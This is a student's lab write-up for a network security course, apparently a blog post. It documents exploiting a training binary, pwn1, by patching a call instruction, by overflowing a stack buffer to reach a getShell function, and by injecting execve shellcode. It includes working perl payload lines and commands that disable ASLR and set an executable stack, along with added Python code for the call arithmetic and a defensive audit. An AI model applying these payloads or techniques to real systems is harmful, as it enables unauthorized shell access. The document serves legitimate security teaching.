2019-2020-2 20175230 Teng Xing "Network Countermeasure Technology" Exp1: Reverse Engineering on the PC Platform

I. Practice objectives

  • 1. The target of this practice is a Linux executable file named pwn1.
  • 2. The normal execution flow is: the main function calls foo, and foo simply echoes back whatever string the user inputs.
  • 3. The program contains another code segment, getShell, which returns a usable shell. This code is not normally executed. The goal of this practice is to find ways to run this code snippet. We will
    learn two ways to run it, and then learn how to inject and run arbitrary shellcode.

II. Practice content

  • 1. Manually modify the executable file so that the program's execution flow jumps directly to the getShell function.
  • 2. Use the BOF vulnerability in the foo function: the attacker constructs an input string that overwrites the return address and triggers the getShell function.
  • 3. Inject shellcode you generated yourself and run it.

III. Basics

Familiarity with basic Linux operations

1. Pipe (|): used to feed file data into a program.
A pipe is a basic IPC mechanism that transfers data between related (parent/child) processes.
It is referenced by two file descriptors, one representing the read end and one representing the write end.
Data written to the write end flows through the pipe and comes out of the read end.

2. Input and output redirection (> >> <)
>: write the output of the command on the left to the specified file or device, overwriting it.
>>: redirect to the file or device in append mode.
<: use a file as the input of a command, e.g. when counting the lines, words and characters of a file with the wc command.

Master the machine code of the NOP, JNE, JE, JMP and CMP instructions

1. NOP: the "no-operation" instruction. When a NOP is executed the CPU does nothing; it is treated as an instruction, executed, and execution continues with the instruction after the NOP.
2. JNE: 75 (conditional branch instruction, jump if not equal).
3. JE: 74 (conditional branch instruction, jump if equal).
4. CMP: 38 to 3D (compare instruction; functionally it corresponds to a subtraction, but the result of comparing the operands is not stored).

Related commands and parameters

1. Disassembly commands
objdump -d <file(s)>: disassemble the code segment;
objdump -S <file(s)>: disassemble the code segment and display source and disassembly interleaved; this requires the -g parameter at compile time, i.e. debug information;
objdump -l <file(s)>: include file names and line numbers in the disassembly

2. Hex editing:
vim displays the contents of the executable file in ASCII form
:%!xxd switches the display mode (between hexadecimal mode and ASCII mode)

3. Common gdb commands
break (b): set a breakpoint
run (r): run the program
clear: clear breakpoints
info: display breakpoint information
attach: attach gdb to a running process

IV. Practice steps

Task 1

Manually modify the executable file to change the program's execution flow

Steps

  • 1. Run the command objdump -d pwn1 | more to disassemble the target file, and locate getShell and foo.

  • 2. "call 8048491" is the assembly instruction that calls the function foo at address 0x8048491. The corresponding machine code is "e8 d7ffffff"; e8 is a relative call, i.e. a jump.
    In the normal flow, EIP at this moment would hold the address of the next instruction, 0x80484ba, but when the CPU executes this e8 instruction it transfers control to the position "EIP + d7ffffff". "d7ffffff" is a two's complement value representing -41 (41 = 0x29), so 0x80484ba + d7ffffff = 0x80484ba - 0x29 = 0x8048491, exactly the address of foo. The main function calls foo with the machine instruction "e8 d7ffffff"; to make it call getShell instead, we just replace "d7ffffff" with the two's complement corresponding to "getShell - 0x80484ba".
    Using the Windows calculator, the complement of 47d - 4ba can be obtained directly: c3ffffff.
    So we modify the executable file so that the target address of the call instruction changes from d7ffffff to c3ffffff.


  • 3. Enter the command vi pwn1, then:
    press the ESC key
    enter :%!xxd to switch the display to hexadecimal mode
    search for the content to be modified, i.e. e8d7
    compare the bytes before and after the match against the disassembly to confirm it is the correct location, then change d7 to c3
    convert back to the raw binary format with :%!xxd -r
    save and exit vi with :wq
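The arithmetic in step 2 (turning "target minus next-instruction address" into the little-endian rel32 byte sequence, and checking the existing bytes against the disassembly before touching them in step 3) can be written down as a small script. The following is an added example, not part of the original write-up; the 5-byte snippet and its base address 0x80484b5 are constructed from the page's values (0x80484ba is the next instruction, so the call itself starts 5 bytes earlier), and the function names are my own.

```python
import struct

def encode_rel32(next_eip: int, target: int) -> bytes:
    """Little-endian rel32 immediate for an e8 call whose following instruction is at next_eip."""
    disp = target - next_eip
    if not -2**31 <= disp < 2**31:
        raise ValueError("target is out of rel32 range")
    return struct.pack("<i", disp)  # two's complement, little-endian

def decode_rel32(next_eip: int, imm: bytes) -> int:
    """Inverse of encode_rel32: recover the absolute call target from the immediate."""
    disp, = struct.unpack("<i", imm)
    return (next_eip + disp) & 0xFFFFFFFF

def patch_call(code: bytes, base: int, call_offset: int,
               expected_target: int, new_target: int) -> bytes:
    """Rewrite the rel32 of the e8 call at code[call_offset], but only after confirming
    that the bytes there really encode a call to expected_target. This is the same
    sanity check the write-up performs by comparing the hex dump with the disassembly."""
    if code[call_offset] != 0xE8:
        raise ValueError("no e8 opcode at the given offset")
    next_eip = base + call_offset + 5           # e8 + 4-byte immediate
    current = decode_rel32(next_eip, code[call_offset + 1:call_offset + 5])
    if current != expected_target:
        raise ValueError(f"bytes encode a call to {current:#x}, not {expected_target:#x}")
    imm = encode_rel32(next_eip, new_target)
    return code[:call_offset + 1] + imm + code[call_offset + 5:]

# Constructed snippet: the "call foo" from main as the page shows it (e8 d7ffffff),
# assumed to sit at 0x80484b5 so that the next instruction is at 0x80484ba.
SNIPPET_BASE = 0x80484B5
SNIPPET = bytes.fromhex("e8d7ffffff") + b"\x90\x90"   # trailing bytes are filler

def demo() -> bytes:
    """Walk through the page's numbers and return the patched snippet."""
    assert encode_rel32(0x80484BA, 0x8048491).hex() == "d7ffffff"   # foo
    assert encode_rel32(0x80484BA, 0x804847D).hex() == "c3ffffff"   # getShell
    return patch_call(SNIPPET, SNIPPET_BASE, 0, 0x8048491, 0x804847D)

if __name__ == "__main__":
    print(demo().hex())
```

Running it prints e8c3ffffff9090: the opcode and the filler are untouched, only the immediate changed, which is exactly the single-byte d7 to c3 edit done in vi above. The check in patch_call is the part worth keeping: a hex editor will happily overwrite any byte, so decode what is already there and compare it against the disassembly before writing.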

Task 2

Construct input parameters that cause a BOF attack and change the program flow

Steps

  • Restore pwn1 from the backup file: cp pwn1.bak pwn1
  • Observe from the disassembly how much space the foo function reserves for its input. From the figure, the number of bytes needed to overflow the buffer is 28+4=32, so the address of getShell has to be placed at the return address, i.e. bytes 33~36. (Below is a test with the input 11111111222222233333334444444455555555)

  • Replace the four characters at positions 33~36 with the memory address of getShell and feed it to pwn1; pwn1 will then run getShell. getShell's memory address can be seen in the disassembly: 0804847d.
  • Construct the input 11111111222222223333333344444444\x7d\x84\x04\x08. Since we cannot type hex values like \x7d\x84\x04\x08 on the keyboard, first generate a file containing this string. \x0a is a newline; without it, you would have to press Enter manually when the program runs.
    perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
  • Use the hex viewer command xxd to check that the contents of the input file are as expected.
  • Then pass the contents of input through the pipe symbol "|" as the input of pwn1.

Task 3

Inject shellcode and execute it

Steps

  • Prepare a piece of shellcode.
    Shellcode is a sequence of machine instructions (code).
    Usually the purpose of these instructions is to obtain an interactive shell (like the Linux shell or cmd.exe under Windows),
    which is why the instruction sequence is called shellcode.
    In practice, any segment of machine instructions used for injection is generically called shellcode, e.g. adding a user or running a command.
  • Change some settings.
    execstack -s pwn1 // make the stack executable
    execstack -q pwn1 // query whether the file's stack is executable
    more /proc/sys/kernel/randomize_va_space
    echo "0" > /proc/sys/kernel/randomize_va_space // disable address randomization
    more /proc/sys/kernel/randomize_va_space

  • Construct the payload to inject.
    Its structure is: anything+retaddr+nops+shellcode.
  • Construct the command
    perl -e 'print "A" x 32;print "\x4\x3\x2\x1\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
    The \x4\x3\x2\x1 above will overwrite the return address on the stack. We have to change it to the address of this shellcode.
    Special reminder: the last character must never be \x0a, otherwise the following steps cannot be carried out.

  • In the original terminal a, run (cat input_shellcode;cat) | ./pwn3. Open another terminal b for gdb debugging; run disassemble foo to disassemble it, and observe that the address of the ret instruction is 0x080484ae. Set a breakpoint there: break *0x080484ae
  • Press Enter in terminal a; the program runs to the breakpoint and stops. In terminal b enter c to continue the program, then enter info r esp to view the address in the esp register.
    It can be observed that 0x01020304 is at address 0xffffd32c, so the shellcode injection location (the position where 0x90 first appears) is 0xffffd32c+0x00000004=0xffffd330.
  • Redefine input_shellcode
    perl -e 'print "A" x 32;print"\x30\xd3\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x90\x00\xd3\xff\xff\x00"' > input_shellcode
    Enter the command (cat input_shellcode;cat) | ./pwn3 to verify whether the result succeeds.
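The "change some settings" step above is the interesting one from a defender's point of view: the injection only works because the binary's stack is made executable (execstack -s) and ASLR is switched off (randomize_va_space = 0). Both facts can be audited without running anything. The following is an added example, not part of the original write-up or of the course material: it reads the PT_GNU_STACK program header that execstack edits (an ELF without that header is treated as executable-stack by the kernel on x86, which is why the function returns True in that case), and reports the current randomize_va_space value if the file exists. The test image is a constructed minimal ELF32, not the real pwn1.

```python
import struct

PT_GNU_STACK = 0x6474E551   # program header type that records the requested stack permissions
PF_X = 0x1                  # execute flag in p_flags

def stack_is_executable(elf: bytes) -> bool:
    """True if the ELF asks for an executable stack (PF_X set on PT_GNU_STACK)
    or carries no PT_GNU_STACK header at all (legacy default: executable)."""
    if elf[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    ei_class, ei_data = elf[4], elf[5]          # 1/2 = ELF32/ELF64, 1/2 = LE/BE
    end = "<" if ei_data == 1 else ">"
    if ei_class == 1:
        e_phoff, = struct.unpack_from(end + "I", elf, 28)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 42)
    elif ei_class == 2:
        e_phoff, = struct.unpack_from(end + "Q", elf, 32)
        e_phentsize, e_phnum = struct.unpack_from(end + "HH", elf, 54)
    else:
        raise ValueError("unknown EI_CLASS")
    for i in range(e_phnum):
        off = e_phoff + i * e_phentsize
        if ei_class == 1:
            p_type, = struct.unpack_from(end + "I", elf, off)
            p_flags, = struct.unpack_from(end + "I", elf, off + 24)   # Elf32_Phdr.p_flags
        else:
            p_type, p_flags = struct.unpack_from(end + "II", elf, off)  # Elf64_Phdr: p_type, p_flags
        if p_type == PT_GNU_STACK:
            return bool(p_flags & PF_X)
    return True  # no PT_GNU_STACK header: kernel falls back to an executable stack

def aslr_level(path: str = "/proc/sys/kernel/randomize_va_space"):
    """Current randomize_va_space value (0 = off, 1 = partial, 2 = full), or None if not readable."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None

def make_elf32(stack_flags: int) -> bytes:
    """Constructed minimal little-endian ELF32 (i386) image: a header plus a single
    PT_GNU_STACK program header. It is not loadable; it exists only to exercise the check."""
    ident = b"\x7fELF" + bytes([1, 1, 1, 0]) + bytes(8)          # ELF32, LE, version 1
    ehdr = ident + struct.pack("<HHIIIIIHHHHHH",
                               2, 3, 1, 0x8048000,   # e_type EXEC, e_machine i386, version, entry
                               52, 0, 0,             # e_phoff right after the header, no sections
                               52, 32, 1,            # e_ehsize, e_phentsize, e_phnum
                               40, 0, 0)             # e_shentsize, e_shnum, e_shstrndx
    phdr = struct.pack("<IIIIIIII", PT_GNU_STACK, 0, 0, 0, 0, 0, stack_flags, 16)
    return ehdr + phdr

def audit(elf: bytes) -> dict:
    """Summarise the two settings the lab relies on for a given ELF image."""
    return {"exec_stack": stack_is_executable(elf), "randomize_va_space": aslr_level()}

if __name__ == "__main__":
    print("RW  stack:", audit(make_elf32(0x6)))   # PF_R|PF_W, what a normal toolchain emits
    print("RWX stack:", audit(make_elf32(0x7)))   # PF_R|PF_W|PF_X, the state after execstack -s
```

Run against a real file with audit(open("pwn1", "rb").read()); exec_stack True together with randomize_va_space 0 is the combination the injection in Task 3 depends on, and either one being back at its default is enough to make the fixed address 0xffffd330 unreliable.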

V. Practice summary

  • What is a vulnerability? What harm can vulnerabilities cause?
    Answer: A vulnerability is a defect in a system or program; vulnerabilities can be used to gain unauthorized access to users or to damage a user's system.
  • Thoughts on the experiment
    Because the teacher provided videos and reference materials for this experiment, the approach was fairly clear, and Task 1 and Task 2 were finished quickly. But in Task 3, through my own carelessness, I miscalculated the injection address 0xffffd32c+0x00000004 as 0xffffd33d (the correct result is 0xffffd330), which caused repeated errors (as follows)

    After careful checking I found and corrected it, and was able to finish. The practice itself was fairly simple and could be done quickly by following the video, but I do not really understand many of the principles behind it; I think only after repeated practice can I understand them more thoroughly.
  • Problem 1 encountered in the experiment: when entering su as a normal user to obtain administrator privileges, the following error appeared

    After looking it up, entering sudo su works.


Source: www.cnblogs.com/tengxing/p/12431052.html